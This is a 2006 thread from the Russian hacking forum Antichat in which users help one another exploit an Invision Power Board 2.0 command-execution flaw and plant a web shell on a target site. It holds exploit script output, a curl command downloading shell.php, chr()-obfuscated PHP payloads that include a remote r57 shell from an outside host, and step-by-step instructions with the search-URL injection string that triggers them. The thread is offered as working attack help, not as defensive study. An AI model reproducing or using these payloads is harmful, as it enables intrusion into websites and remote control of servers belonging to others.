HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Ipb 2.0* Могу выполнять команды, проблемма с заливкой шелла
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.10.2006, 13:05
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию
Цитата:
Сообщение от samsam  
Ни фига не че не выполняется
Ситуация такая
C:\>1.pl -h www.site.org -d /forums/ -l user -p pass -f 22 -v 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
Invision Power Board 2.* commands execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
[~] SERVER : www.site.org
[~] PATH : /forums/
[~] LOGIN : user
[~] PASSWORD : pass
[~] TARGET : 0 - IPB 2.0.*
[~] Login ... [ DONE ]
[+] SID: 758a3333eaf4c82485785c17be49d61f
[~] Try get md5_check ... [ DONE ]
[+] MD5_CHECK : 3f1f3e57fec974df1360c447cef364fb
[~] Create new message ... [ DONE ]
[~] Search message ... [ DONE ]
[+] SEARCHID: b8d3ddbfcbf65b005eefecbb7191811c

Command for execute or 'exit' for exit #curl -o /tmp/shell.php http://site.ru/shell.php

Go to www.site.org/forums/index.php?act=Search&CODE=show&searchid=45cf31c70a 91f57ddcb09792b06d876e&search_in=posts&result_type =posts&highlite=eval&lastdate=z|eval.*?%20//)%23e%00

Перехожу на эту страницу она пустая.
Хочу запустить шел типа ввожу строку

www.site.org/forums/tmp/shell.php
ответ прост
Not Found
The requested URL http://www.site.org/forums/tmp/r.php was not found on this server.
Помогите кто чем может.
А нелутче тебе руками попробывать пороботать запостить пост с Чарсет и заинклудить шелл о РСТ

Постиш пост например :

PHP код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); // 
Потом идёш в поиск пиши в поиске найти "Filter by Member Name (optional)" пишеш свой ник и ставиш
"*" напротив "Show results as posts" и жмеш поиск потом в конец формы вставляеш "eval&lastdate=z|eval.*?%20//)%23e%00" и всё шелл от РСТ у тебя
Последний раз редактировалось _-[A.M.D]HiM@S-_; 28.10.2006 в 13:08..
 
Ответить с цитированием

  #12  
Старый 30.10.2006, 09:50
samsam
Новичок
Регистрация: 27.10.2006
Сообщений: 12
С нами: 10283231

Репутация: -7
По умолчанию
Цитата:
Сообщение от _-[A.M.D]HiM@S-_  
А нелутче тебе руками попробывать пороботать запостить пост с Чарсет и заинклудить шелл о РСТ

Постиш пост например :

PHP код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); // 
Потом идёш в поиск пиши в поиске найти "Filter by Member Name (optional)" пишеш свой ник и ставиш
"*" напротив "Show results as posts" и жмеш поиск потом в конец формы вставляеш "eval&lastdate=z|eval.*?%20//)%23e%00" и всё шелл от РСТ у тебя
Вот ты говорш постим пост а что в нем зашифрованно и как потом запустит шелл.???
Если не сложно то ответь!!!
Может давайц по асе спишемся??
 
Ответить с цитированием

  #13  
Старый 30.10.2006, 15:07
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.
 
Ответить с цитированием

  #14  
Старый 31.10.2006, 22:13
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию
1. Постим сообщение eval(system(dir)); //'

А лучше постить такое сообщение eval(include(chr(104).chr(116).chr(116).chr(112).c hr(58).chr(47).chr(47).chr(115).chr(101).chr(114). chr(103).chr(101).chr(121).chr(120).chr(108).chr(4 6).chr(98).chr(121).chr(46).chr(114).chr(117).chr( 47).chr(114).chr(53).chr(55).chr(115).chr(104).chr (101).chr(108).chr(108).chr(46).chr(112).chr(104). chr(112))); //
и вуаля мы видим нам знакомый шелл.
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с заливкой шелла в Invision Power Board v2.1.7 DeadMeat Уязвимости CMS / форумов 9 24.02.2010 11:48
Проблеммы с заливкой шелла в ipb 1.3. $klip Уязвимости CMS / форумов 3 13.11.2006 03:11
Основные команды командной строчки. silveran Windows 5 27.10.2005 14:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.